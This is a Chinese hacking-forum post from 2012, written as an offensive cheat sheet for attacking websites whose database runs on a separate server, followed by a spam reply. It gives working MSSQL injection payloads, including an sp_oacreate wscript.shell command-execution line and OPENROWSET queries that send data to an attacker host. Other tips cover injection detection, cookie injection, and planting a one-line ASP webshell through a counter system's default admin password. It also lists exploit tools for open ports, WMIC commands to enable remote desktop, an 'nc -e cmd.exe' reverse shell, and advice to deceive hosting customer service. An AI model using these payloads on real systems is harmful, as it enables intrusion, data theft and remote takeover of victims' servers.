找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3652|回复: 1
打印 上一主题 下一主题

站库分离的方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:41:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
SA点数据库分离技术相关
. i" ^) W  m' ^: f/ l# ]  `; m+ _3 X& \0 S" G

! N1 N4 h: K! X' ?SA点数据库分离搞法+语句:
; L$ ^, a7 ~) r
/ M7 D3 s6 i( P  ~2 A* C/ `注射点不显错,执行下面三条语句页面都返回正常。
+ o3 i! X. }4 C, Aand 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')" }8 V, _( U# w
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')
% i5 ]0 N) o" A+ \5 rand 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
3 E% Z. q4 L6 O2 t( J可以列目录,判断系统为2000,web与数据库分离# e, z; G& I6 f5 A+ C
遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。; l( d- Q( x' f- m; p
在注射点上执行
" y: T' `" I" C" o/ @declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--; m/ e9 K* b  M0 [3 v5 c& l
页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP7 R7 D% b" X' S, W/ I
还有我用NC监听得其他端口都没有得到IP。  Q8 j2 M# f1 u' |1 ^

3 N6 I% A8 U+ ]; D( X- O通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。) A# g$ r- y5 W# N& s
'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--! h0 L3 O7 e  _$ R$ Z/ F* r
$ [3 N' |  T) `" H# s4 W( t3 F' }4 ?7 Q
;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--
5 L/ o- |) O5 ~9 v" O+ s; h9 T" w
' [/ [2 `: P" _9 o现在就猜想是不是数据库是内网而且不能连外网。
$ y3 H1 Y# ]7 o7 C: D9 ^, q7 C$ c8 c% q' ^3 u6 ~+ w! \, e& L

8 b0 \& Q7 x& n, N# v2 haccess导出txt文本代码  d9 l1 t8 x3 L* J0 t
SELECT * into [test.txt] in 'd:\web\' 'text;' from admin# F+ E8 D- F7 o1 P  g

3 H7 x) B+ R/ x8 S2 A" m1 V9 |$ q; Y
- R' Y6 p0 a4 j  A' Z; \' ?6 M
自动跳转到指定网站代码头
* K9 C" G! U( C<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>, x  \- k0 l4 a' D0 ^
* O- M( {6 a, d# I8 q; a

8 M. ]. ^, U; f1 w4 G' X入侵java or jsp站点时默认配置文件路径:
  T  _' Q3 r; h$ X+ L% B' S\web-inf\web.xml; y4 Y3 a+ u' {% W
tomcat下的配置文件位置:2 Q7 V, g1 s; F1 p/ T
\conf\server.xml            (前面加上tomcat路径)6 D( }7 k% L4 Q5 U6 E
\Tomcat 5.0\webapps\root\web-inf\struts-config.xml3 n. r" g9 r: q, P" A
. c% G$ _% u/ m  G" B
1 ~3 v  Y  f! f

1 _8 U; }7 T# R$ d3 T检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:& h. _* \2 M% V: C8 p
-1%233 b% t/ m2 W) M+ y" r" W
>
* {3 p& j+ v' R9 k/ M<, K6 {: U3 }& P) E
1'+or+'1'='1
- q' D  r. |  O- P+ \& Mid=8%bf
. W, A. l. C6 a
; F3 U: o* a3 r% r  z全新注入点检测试法:
+ F0 j3 P/ y* j* ?2 ^, Y2 Y在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。) R, M  q* u* B; I$ X

1 ]0 c# s! Q+ `# |. i4 s5 C在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。" C6 f1 h8 y) b; }

& Y5 u% F0 `, X, `2 V+ z搜索型注入判断方法:) I. Q6 p# B! J9 ~1 n
北京%' and '1'='1' and '%'='& |7 B0 z( G! g( n
北京%' and '1'='2' and '%'=': f& P, u8 A+ X# H5 o4 ]. h, W+ n

9 I$ N0 e4 r; n; |% l' O- y
4 o  `, l( V. R4 L: m% K$ dCOOKIES注入:; ?& D4 I- ?# K5 ]
: v' F3 R9 H; b9 l% g, a# z
javascript:alert(document.cookie="id="+escape("51 and 1=1"));" r0 p9 n) x# s' g5 K2 n

" Q7 J7 ~1 p) Z% Q) J& A7 Q) h; `2000专业版查看本地登录用户命令:
' {- o1 I0 i2 onet config workstation' ~% k3 l8 y' H; @) y+ q) t

  \8 x) m2 p# e# l( \) i+ N9 R
- T! U' x, a) ~( r9 g2003下查看ipsec配置和默认防火墙配置命令:
* X9 |1 _2 |- U2 ?netsh firewall show config5 A) L) l& [4 t6 L( s  s8 B6 H8 a
netsh ipsec static show all
3 h8 {- ]4 b7 X  I2 p" u' s6 u( U& Q2 I: E3 L0 s" l
不指派指定策略命令:5 q  x2 J, p6 s7 ]/ n+ H% k6 R, C
netsh ipsec static set policy name=test assign=n  (test是不指派的策略名)
  |6 F3 j) `, [9 `& c. y8 onetsh ipsec static show policy all  显示策略名% t! y5 K& q$ F! b5 c! U% c

" O& O9 l+ o! e- J4 Y% h, I; t' M) d  Q, c; H
猜管理员后台小技巧:
2 g$ g: }7 I' d, x" U; Jadmin/left.asp   V. [; q" g3 A$ r* L
admin/main.asp: r. \) x# A) A9 ?- t6 Z" T/ Z( b: [
admin/top.asp" N: Y( g" w7 T& d2 q7 S" r
admin/admin.asp # `) j, ^5 z4 Z
会现出菜单导航,然后迅雷下载全部链接
) o" g, v$ n/ g  c. b- T  y5 i( V$ ^3 j1 X. K4 q3 v( H

9 g% m+ y+ u1 A% p社会工程学:3 B. }8 ^! S: J* V$ u; o3 j* t
用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人
0 q  V9 Q( ~8 J, a( @" t然后去骗客服. g- H$ \6 Q; u; C5 q8 T, M; \) Q3 h
9 i: J0 u, t3 M4 k% G  }) V
& S) u8 k, y/ w8 y3 n& _* D
统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码:
5 H# ]6 f" X2 Y& e; S查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">,
, |& ]% `: j' l5 O5 v9 Q% o( x1 ~" H  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。+ K. [9 u  j7 k
# q$ c. D" k' ]

  Q  u. L; A+ |& L8 w
/ o7 A3 [0 L4 V) C3 L6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)
( c( M2 v$ Y) P0 r4 t. M) o- g# b2 T/ t0 H, Z2 p; {" ]" r

8 k; r- y$ P+ t" r6 ]' o8 I
9 Q. {; D& E% K4 I8 v6 V5 W% tCMD加密注册表位置* H+ M" z, z; s3 w+ M
(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor  R; F* S1 q, ]# t- H( Y1 `" Q
AutoRun* X1 Y3 W# m- G" D/ {4 D
4 w: Z6 V6 w, X8 [; j$ n0 a4 a  q- C
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor! H3 o5 o4 D- m2 Y" f0 [0 C
AutoRun  ]) V2 l0 C8 k" J7 `

* U& g6 ~  J5 \3 A8 r0 w; Z% T8 [9 {
' z+ }/ A! M! T/ @1 K4 k: B( f% Q在找注入时搜索Hidden,把他改成test3 `: j3 ?" G/ a+ U* J+ x
) ]) _$ @' F) ~8 _1 i+ [
( \5 _0 \7 L& r
; g6 ~5 H% k* ~2 c$ Q) p  F: e) B- @
mstsc /v:IP /console ! f* I1 M. y9 @& z0 a

5 r6 M/ r# z( W5 X' Y5 w" n3 X$ D! ^  I" s  V3 j
一句话开3389:
+ f) i2 `, T6 O" U" u; v" q
6 _$ a: r0 C) k最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  3 N. [1 e3 k" ?9 e# j2 Z0 q
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.4 a$ K% h) B. j; k: }6 s- u
- E* a( f! U3 g/ \) c& H! i# R. F5 t
- J. ~9 c& |4 L; G
知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:
1 }- B9 A7 C! W, N4 [/ B/ pInsert into admin(user,pwd) values('test','test')1 g. z1 j9 i2 k3 a3 _% V6 t/ B  h

. h/ N: {7 K6 G+ V' ?& F7 g/ G& }  ~$ Y
NC反弹. H1 M* j4 T# a8 H$ m3 W
先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   7 _7 e, S7 g$ K4 V2 M3 K6 U
然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)
; g0 M& b! n$ F; c- H
! L8 m! L% x5 O' {# I
! E; B% G  \' |1 A在脚本入侵过程中要经常常试用%00来确认下参数是否有问题( }! H/ }8 w+ f9 m! p, y! o, l, z, U
8 b5 O4 i/ m" |. D& r3 h) y
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录2 N# J9 `8 m8 {% |$ v+ s
例如:! t. ]5 j9 |0 T  R0 G' b
subst k: d:\www\ 用d盘www目录替代k盘/ Z4 e/ k* I. |  t6 _3 A/ L
subst k: /d  解除K盘代替
回复

使用道具 举报

沙发
匿名  发表于 2017-12-20 02:36:51
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表